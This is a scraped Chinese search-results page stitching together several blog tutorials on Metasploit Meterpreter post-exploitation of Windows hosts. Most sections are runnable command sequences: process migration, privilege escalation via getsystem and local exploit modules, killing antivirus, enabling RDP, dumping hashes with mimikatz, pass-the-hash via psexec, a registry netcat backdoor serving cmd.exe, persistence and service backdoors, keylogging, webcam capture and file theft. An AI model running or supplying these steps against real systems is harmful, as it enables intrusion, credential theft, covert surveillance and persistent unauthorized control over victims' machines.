精华内容
下载资源
问答
  • 这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载按照向导关注我们的自媒体平台即可,谢谢支持!
  • Meterpreter后渗透之信息收集 在获得目标的Meterpretershell进行信息收集是后渗透工作的基础 记录一下关于meterpreter信息收集的使用 环境: kali linux 192.168.190.141 xp靶机192.168.190.140 生成木马监听...

    Meterpreter后渗透之信息收集

    在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础

    记录一下关于meterpreter 信息收集的使用

    环境: kali linux 192.168.190.141

           xp靶机 192.168.190.140

    生成木马 监听反弹shell上线

     

     

     

     

    信息收集:

     

     ========================================================================================================================

    0x01进程迁移:

    ps命令获取目标正在运行的进程:

     

    getpid命令查看 meterpreter shell的进程号:

     

     可以看到pid为488 进程名为win.exe

    使用migrate命令 进行shell的进程迁移:

    成功迁移到pid为768的explorer.exe进程中。

    迁移后原shell的进程(pid为488)会自动关闭,没有关闭也可以输入kill指令关闭 kill 488 

    也可以使用自动迁移进程命令:

    run post/windows/manage/migrate

     

     

     

     

    0x02 系统命令

    获得稳定进程后,接下来收集系统信息。

    sysinfo查看目标系统信息

     

     查看是否是虚拟机 run post/windows/gather/checkvm

     

    idletime命令查看目标机最近运行时间:

     

    route命令查看目标机完整网络设置:

     

     

     

    getuid获得用户名和计算机名称

     

    run post/windows/manage/killav 命令关闭杀毒软件

     

    run post/windows/manage/enable_rdp 开启3389

     

     run get_local_subnets 查看目标机本地子网情况

    在meterpreter 会话上直接添加去往目标网段的路由

    run autoroute -s xxxxx

    查看路由添加情况 

    run autoroute -p

    枚举当前有多少用户:

    run post/windows/gather/enum_logged_users

     

    screenshot命令抓取主机屏幕截图:

    webcam_list 查看目标机是否有摄像头;

    webcam_snap命令打开摄像头,拍一张照片

    webcam_stram命令开启直播模式

     

    shell命令进入目标机shell;

     

     exit停止meterpreter会话 也可以用于shell返回meterpreter会话。

     

     

     

     

    文件系统命令

    pwd或者getwd查看shell处于的目标

     

    getlwd 查看当前处于本地哪个目录

     

     cd 切换目录 search搜索文件 例如 search -f *.txt -d c:\\

     

    download 命令下载文件

    upload命令上传文件

     

    posted @ 2019-03-11 10:35 卿先生 阅读(...) 评论(...) 编辑 收藏

    展开全文
  • 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、提权相关的问题 getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用...

    这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题

    1、shell里的中文乱码

    获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码

    解决方法:在输入shell之后,再输入chcp 65001

    在这里插入图片描述

    2、提权相关的问题

    getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、

    (提权方式:1、getsystem 2、系统内核漏洞提权 3、绕过UAC提权)

    1)解决方法一:
    我常使用exploit/windows/local/ask模块,该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行,如果用户选择“yes”,就可以程序返回一个高权限meterpreter shell(需要执行getsystem)

    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述

    2)解决方法二:
    绕过UAC提权,msf内置多个pypassuac脚本,运行后返回一个新的会话,需要再次执行getsystem获取系统权限

    3)解决方法三:

    在搜集资料时发现了一个更牛逼的模块,Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权

    首先要获取目标主机的meterpreter会话,才能使用这个模块。而且在使用这个模块之前,我们需要先把当前的meterpreter会话放到后台运行(CTRL+Z)

    现在我们获取到的meterpreter会话是3,执行下列命令:

    use post/multi/recon/local_exploit_suggester
    set LHOST 192.168.43.133
    set SESSION 3
    exploit
    

    在这里插入图片描述

    这里我试了几个,有些可能不行(可能有误报或差别),选了一个exploit/windows/local/ms15_051_client_copy_image(打了几次才成功):

    use exploit/windows/local/ms15_051_client_copy_image
    set lhost 192.168.43.133
    set session 3
    exploit
    

    在这里插入图片描述

    3、开启远程桌面

    run getgui -e
    run getgui -u zwish -p zwish
    run getgui -f 6661 –e   #3389端口转发到6661
    

    新开一个终端

    rdesktop 127.0.0.1:6661

    有时候也可以不用端口转发rdesktop ip:3389

    如果使用run getgui -u 用户名 -p 密码 不能添加成功,可以试一下post/windows/manage/enable_rdp模块

    但可能还是会报1332这个错,具体原因google了一下还是没有找到解决方案,解决了的dalao麻烦教教dd

    4、抓取密码(hash)

    mimikatz

    load mimikatz    #help mimikatz 查看帮助
    wdigest  #获取Wdigest密码
    mimikatz_command -f samdump::hashes  #执行mimikatz原始命令
    mimikatz_command -f sekurlsa::searchPasswords
    

    在这里插入图片描述

    在这里插入图片描述

    5、注册表操作

    1)注册表基本命令

    reg –h
        -d   注册表中值的数据.    -k   注册表键路径    -v   注册表键名称
        enumkey 枚举可获得的键    setval 设置键值    queryval 查询键值数据
    

    2)注册表设置nc后门

    upload /usr/share/windows-binaries/nc.exe C:\windows\system32 #上传nc
    reg enumkey -k HKLM\software\microsoft\windows\currentversion\run   #枚举run下的key
    reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
    reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc   #查看键值
    
    nc -v 192.168.159.144 443  #攻击者连接nc后门
    

    6、哈希利用

    1)获取哈希

    run post/windows/gather/smart_hashdump #从SAM导出密码哈希

    需要SYSTEM权限

    2)PSExec哈希传递

    通过smart_hashdump获取用户哈希后,可以利用psexec模块进行哈希传递攻击

    前提条件:①开启445端口 smb服务;②开启admin$共享

    msf > use exploit/windows/smb/psexec
    msf > set payload windows/meterpreter/reverse_tcp
    msf > set LHOST 192.168.159.134
    msf > set LPORT 443
    msf > set RHOST 192.168.159.144
    msf >set SMBUser Administrator
    msf >set SMBPass aad3b4*04ee:5b5f00*c424c
    msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
    msf >exploit
    

    7、持久化(后门植入)

    metasploit自带的后门有两种方式启动的,一种是通过启动项启动(persistence),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。

    1)persistence启动项后门

    C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本

    在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项

    run persistence –h #查看帮助

    run persistence -X -i 5 -p 6661 -r 192.168.159.134

    -X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip

    连接后门

    msf > use exploit/multi/handler
    msf > set payload windows/meterpreter/reverse_tcp
    msf > set LHOST 192.168.159.134
    msf > set LPORT 6661
    msf > exploit
    

    2)metsvc服务后门

    C:\Users***\AppData\Local\Temp\上传了三个文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通过服务启动,服务名为meterpreter

    run metsvc –h # 查看帮助

    run metsvc –A #自动安装后门

    连接后门

    msf > use exploit/multi/handler
    msf > set payload windows/metsvc_bind_tcp
    msf > set RHOST 192.168.159.144
    msf > set LPORT 31337
    msf > exploit
    

    8、更多资料

    后渗透之meterpreter使用攻略 :https://xz.aliyun.com/t/2536#toc-12

    metasploit下Windows的多种提权方法:https://www.anquanke.com/post/id/85064

    Windows内核提权 :https://xz.aliyun.com/t/2862?spm=5176.12901015.0.i12901015.4d6a525cRdiEq4&accounttraceid=471428ecdd3a42548b6f7408324904eagyth

    展开全文
  • Meterpreter后渗透测试

    2020-05-05 15:33:31
    Meterpreter后渗透测试 特征 Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个 ...

    Meterpreter后渗透测试

    特征

    Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个 meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和 IP 地址等信息。另外 Meterpreter 能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此 HIDS(基于主机的入侵检测系统)很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter 还可以简化任务创建多个会话,可以来利用这些会话进行渗透。

    Meterpreter工作优点

    1、不创建进程(使用的内存注入方式)
    2、Meterpreter 是一个解释器加载各种攻击命令
    3、工作在被攻击进程的上下文中
    4、通信是加密的(TLV协议),可以躲避 IDS
    5、没有硬盘写入操作
    6、使用的通信方式是信道模式,可以同时和几个信道工作,支持多信道
    7、支持扩展编写

    Meterpreter工作过程

    1、漏洞的利用代码+第一阶段的攻击载荷
    2、攻击载荷反向连接到 msf
    3、发送第二阶段的攻击载荷
    4、客户端和服务器进行通信

    常用的系统命令

    background,把当前的会话设置为背景,需要的时候在启用
    getuid,查看对方正在运行的用户
    ps,列出所有的进程
    getpid,返回运行 meterpreter 的 id 号
    sysinfo,产看系统信息和体系结构
    shell,切换到 cmd 的系统权限方式
    exit,退出 shell 会话返回 meterpreter 或终止 meterpreter

    进程迁移和提权

    getsystem:会自动利用各种各样的系统漏洞来进行权限提升
    migrate:进程 id 进程迁移

    和目标建立多重通信的信道

    excute,用来启用多重通信信道
    excute-fexploit.exe-c
    channel-l,列出可用通信信道
    interact,和信道进行交互(获得cmd)
    write3,向信道写入数据,以‘.’结束

    常用的文件系统的命令

    pwd,查看当前所在的工作目录
    cd,切换到想要的工作目录
    search-f*.dof-dc:\,搜索文件
    download,支持文件下载
    download c:\a.doc /root,下载到本地的root目录
    upload /root/mm.exe c:\sys.exe,上传到远程主机
    timestomp,更改文件属性
    timestompc:/a.doc-v,查看文件的时间信息。
    timestompc:/a.doc-c"9/23/201314:22:11",修改文件的创建时间
    -m,-a,文件的修改时间和最后一次访问的时间。
    -z,修改所有时间,尽量不要用。
    -v,查看

    常用的网络命令

    ipconfig,查看ip配置
    route,显示路由表,也可以配置ip地址,和linux方法一样
    routeaddip,地址掩码网关
    portfwd,做端口转发的时候用的
    portfwd-a-L127.0.0.1-l888-h7.6.5.4-p5631
    -a,添加一个新的转发规则
    -L,目标主机的IP地址
    链接127.0.0.1的888端口,会被转发到7.6.5.4的5631端口
    enumdesktops,是列出所有可访问的桌面
    getdesktop,返回用户的桌面
    setdesktop,设置到某个会话的桌面
    keyscan_start,安装键盘窃听器
    keyscan_dump,导出活跃桌面的键盘记录
    关于windows的桌面的编号0控制台12其他会话或远程登陆。

    Meterpreter脚本

    使用runscriptname方式执行

    1、vnc脚本,获取远程机器vnc界面控制
    meterpreter>runvnc
    meterpreter>runscreen_unlock

    2、进程迁移
    当攻击成功后将连接进程从不稳定进程(如使用浏览器溢出漏洞exp进行攻击时浏览器
    可能会被目标关闭)迁移至稳定进程(explorer.exe),保持可连接。
    例子:
    meterpreter>runpost/windows/manage/migrate
    (在64位win7中migrate需要管理员权限执行后门才能成功,而migrate前后获取的
    权限是有差异的。)

    3、关闭杀毒软件
    meterpreter>runkillav(这个脚本要小心使用,可能导致目标机器蓝屏死机。)

    4、获取系统密码hash
    meterpreter>runhashdump
    (64位win7下需要管理员权限执行后门且先getsystem,然后使用
    runpost/windows/gather/hashdump来dumphash成功率更高。
    而且如果要使用shell添加系统账户的话win7下得先:
    runpost/windows/escalate/bypassuac,不然可能不会成功。)

    5、获取系统流量数据
    meterpreter>runpacktrecorder–i1

    6、直捣黄龙
    可以干很多事情:获取密码,下载注册表,获取系统信息等
    meterpreter>runscraper

    7、持久保持
    当目标机器重启之后仍然可以控制
    meterpreter>runpersistence–X–i50–p443–r192.168.1.111
    -X开机启动-i连接超时时间–p端口–rIP
    下次连接时:
    msf>usemulti/handler
    setpayloadwindows/meterpreter/reverse_tcp
    setLPOST443
    setLHOST192.168.1.111
    exploit
    (会在以下位置和注册表以随机文件名写入文件等信息,如:
    C:\Users\YourtUserName\AppData\Local\Temp\MXIxVNCy.vbs
    C:\Users\YourtUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)

    基本命令

    Meterpreter > backgroud
    Msf exploit (ms_067_netapi) > sessions
    Msf exploit (ms_067_netapi) > sessions -i 1
    Meterpreter > quit
    Meterpreter > shell

    文件系统
    Meterpreter >cat c:\boot.ini
    Meterpreter >getwd
    Meterpreter >upload -h
    Meterpreter >upload netcat.exe c:
    Meterpreter >download C:\“program Files”\Tencent\QQ\User\13456\Msg2.0.db /etc
    用QQlogger打开
    Meterpreter >edit c:\windows\system32\drivers\etc\hosts
    Meterpreter >search -h

    网络命令
    Meterpreter >ipconfig
    Meterpreter >portfwd -h
    Meterpreter >route

    系统命令
    Meterpreter >ps
    Meterpreter >migrate
    Meterpreter >execute
    Meterpreter >sysinfo
    Meterpreter >info

    展开全文
  • Meterpreter后渗透模块之信息收集

    千次阅读 2021-09-23 16:45:59
    从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter &...

    进程迁移

    在获取meterpreter会话或者进行其他测试时,由于shell不能保持很强的稳定性,导致进程被管理员察觉、被用户关闭等等,导致渗透过程失败,我们需要将shell移动到一个稳定的进程内,这样使得渗透更加难以被察觉

    1)手动迁移

    先使用ps查看目标正在运行的进程

    查看当前进程号

    meterpreter > getpid
    
    Current pid: 1104

    从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号

    meterpreter > migrate 2844
    
    [] Migrating from 1104 to 2844...
    
    [] Migration completed successfully.
    
    meterpreter > getpid
    
    Current pid: 2844
    
    meterpreter >

    2)自动化迁移:run post/windows/manage/migrate

    自动将进程迁移至2092

    meterpreter > run post/windows/manage/migrate 
    
    [*] Running module against WIN-LJF52BIKAP6
    [*] Current server process: Explorer.EXE (2844)
    [*] Spawning notepad.exe process to migrate into
    [*] Spoofing PPID 0
    [*] Migrating into 2092
    [+] Successfully migrated into process 2092
    meterpreter > 

    系统命令

    1)查看目标机的系统信息:sysinfo

    meterpreter > sysinfo
    Computer        : WIN-LJF52BIKAP6
    OS              : Windows 7 (6.1 Build 7600).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x64/windows
    meterpreter > 

    2)查看是否运行在虚拟机上:run post/windows/gather/checkvm

    meterpreter > run post/windows/gather/checkvm 
    
    [*] Checking if WIN-LJF52BIKAP6 is a Virtual Machine ...
    [+] This is a VMware Virtual Machine
    meterpreter >

    3)查看运行时间:idletime

    meterpreter > idletime
    User has been idle for: 18 mins 41 secs
    meterpreter > 

    4)查看当前权限:getuid

    meterpreter > getuid
    Server username: WIN-LJF52BIKAP6\root
    meterpreter > 

    5)关闭杀毒软件:run killav

    meterpreter > run killav 
    
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
    [!] Example: run post/windows/manage/killav OPTION=value [...]
    [*] Killing Antivirus services on the target...
    [*] Killing off cmd.exe...
    meterpreter >

    6)启动目标机的远程桌面协议RDP(3389):run post/windows/manage/enable_rdp

    meterpreter > run post/windows/manage/enable_rdp 
    
    [*] Enabling Remote Desktop
    [*]     RDP is disabled; enabling it ...
    [*] Setting Terminal Services service startup mode
    [*]     The Terminal Services service is not set to auto, changing it to auto ...
    [*]     Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210922101221_default_192.168.200.137_host.windows.cle_401476.txt

    7)查看多少用户登录目标机:run post/windows/gather/enum_logged_on_users

    meterpreter > run post/windows/gather/enum_logged_on_users 
    
    [*] Running against session 1
    
     SID                                             User
    
    ---                                             ----
    
     S-1-5-21-2231621843-1934586931-3466173265-1000  WIN-LJF52BIKAP6\root
    
    [+] Results saved in: /root/.msf4/loot/20210922110534_default_192.168.200.137_host.users.activ_248353.txt
    
     SID                                             Profile Path
    
    ---                                             ------------
    
     S-1-5-18                                        %systemroot%\system32\config\systemprofile
     S-1-5-19                                        C:\Windows\ServiceProfiles\LocalService
     S-1-5-20                                        C:\Windows\ServiceProfiles\NetworkService
     S-1-5-21-2231621843-1934586931-3466173265-1000  C:\Users\root
     S-1-5-21-2231621843-1934586931-3466173265-1001  C:\Users\ganyu
    
    
    meterpreter > 

    8)列举用户安装在系统上的应用程序(目标机只存在AWVS):run post/windows/gather/enum_applications

    meterpreter > run post/windows/gather/enum_applications 
    
    [*] Enumerating applications installed on WIN-LJF52BIKAP6
    
     Name      Version
    
    ----      -------
    
     Acunetix  13.0.200205121
    
    [+] Results stored in: /root/.msf4/loot/20210922110814_default_192.168.200.137_host.application_719627.txt
    meterpreter > 

    文件系统命令

    查看当前属于目标机的工作目录的路径名称:pwd

    meterpreter > pwd
    C:\Windows\system32
    meterpreter > 

    查看当前处于本地的哪个目录:getlwd

    meterpreter > getlwd
    /root/桌面
    meterpreter > 

    列出当前目录的所有文件:ls

    查看目标1.txt文件内内容:cat 1.txt

    meterpreter > cd c:/perfLogs/Admin
    meterpreter > ls
    
    Mode              Size  Type  Last modified              Name
    
    ----              ----  ----  -------------              ----
    
    100666/rw-rw-rw-  25    fil   2021-09-22 11:27:28 +0800  1.txt
    
    meterpreter > vim 1.txt
    [-] Unknown command: vim.
    meterpreter > cat 1.txt
    12123wwewdsxcddsdwassdwedmeterpreter > 

    搜寻、拷贝、上传文件至目标(需要拥有system权限,可以利用getsystem、MS16-032漏洞进行提权)

    搜寻c盘内所有以txt为后缀的文件:search -f *.txt -d c:\

    拷贝文件至kali内:download c:\1.txt /root

    上传文件至win7C盘目录下:upload /home/zidian/msfadmin.txt c:\

    展开全文
  • Metasploit是一个框架,加载payload成功拿下靶机可以进行的进一步操作称之为后渗透命令。 Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,...
  • meterpreter后渗透之权限维持

    千次阅读 2019-08-09 19:50:00
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -o ~/Desktop/test2.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f elf > shell....
  • 继上一篇得到的普通session进行提权 ...2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
  • 仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到...
  • 1. Meterpreter优势: a. 纯内存工作模式,不需要对磁盘进行任何写入操作; b. 使用加密通信协议,而且可以同时与几个信道通信; c. 在被攻击进程内工作,不需要创建新的进程; d. 易于在多进程之间迁移; e. 平台...
  • 后渗透meterpreter使用攻略

    千次阅读 多人点赞 2019-01-06 14:38:28
    Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本...
  • 一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序...
  • 后渗透Meterpreter常用命令记录

    千次阅读 2017-12-18 23:35:15
    meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标...
  • metasploit后渗透入门--meterpreter

    千次阅读 2019-01-14 14:02:34
    0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/...
  • meterpreter模块之后渗透攻击实战总结

    千次阅读 多人点赞 2018-10-11 19:22:30
    meterpreter模块之后渗透攻击 文章目录meterpreter模块之后渗透攻击一:进程迁移二:系统命令1:查看系统信息2:查看目标主机运行时间3:查看当前主机用户名及其权限4:查看完整网络设置路由信息5:关闭杀毒软件6:...
  • meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况:...
  • 在这篇文章中,我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,以及获取用户键盘记录等等。 相关Payload Payload中包含有...
  • Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。 当H.D. Moore在2003年发布Metasploit时,...
  • Meterpreter深度渗透 通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。 Meterpreter会话下: upload:从kali主机上传到靶机 upload /usr/share/windows-binarier/nc.exe C:\ get...
  • 内网渗透之如何玩转Meterpreter

    千次阅读 2017-05-30 22:29:38
    这对我们的渗透,也带来了不少的麻烦。今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的! 由于绕过 UAC 的功能需在 meterpreter 的shell 才能实现。因此...
  • 渗透测试——Meterpreter

    千次阅读 2019-02-18 14:43:36
    纯内存工作模式:执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标进程空间中,而不是先将 Meterpreter 上传到磁盘然后再调用 Loadlibrary 加载动态链接库来启动 Meterpreter。这里便会有一个...
  • meterpreter模块之后渗透攻击实战总结,自己渗透的总结,希望对你的渗透水平提高有帮助,meterpreter模块是各种漏洞的攻击渗透模块
  • 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter ...
  • 后渗透meterpreter学习笔记

    千次阅读 多人点赞 2019-09-25 09:45:11
    Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,930
精华内容 1,972
关键字:

meterpreter后渗透